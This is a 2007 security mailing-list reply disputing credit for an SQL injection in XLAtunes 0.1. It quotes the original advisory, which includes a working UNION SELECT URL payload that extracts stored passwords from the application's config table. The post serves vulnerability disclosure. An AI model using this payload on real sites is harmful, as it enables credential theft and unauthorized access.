<<< Date Index >>>     <<< Thread Index >>>

Re: XLAtunes 0.1 (album) Remote SQL Injection Vulnerability



This was actually found by Bl0od3r, and was posted on the 17th.  Yep
you pretty much nop'ed the found by section, nice job.

http://www.milw0rm.com/exploits/3327

/str0ke

On 19 Feb 2007 19:27:31 -0000, Guns@xxxxxxxxxxx <Guns@xxxxxxxxxxx> wrote:
#Critical Status:High
#Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#confkey->Password
#confvalue->Username
#Table:config
#http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*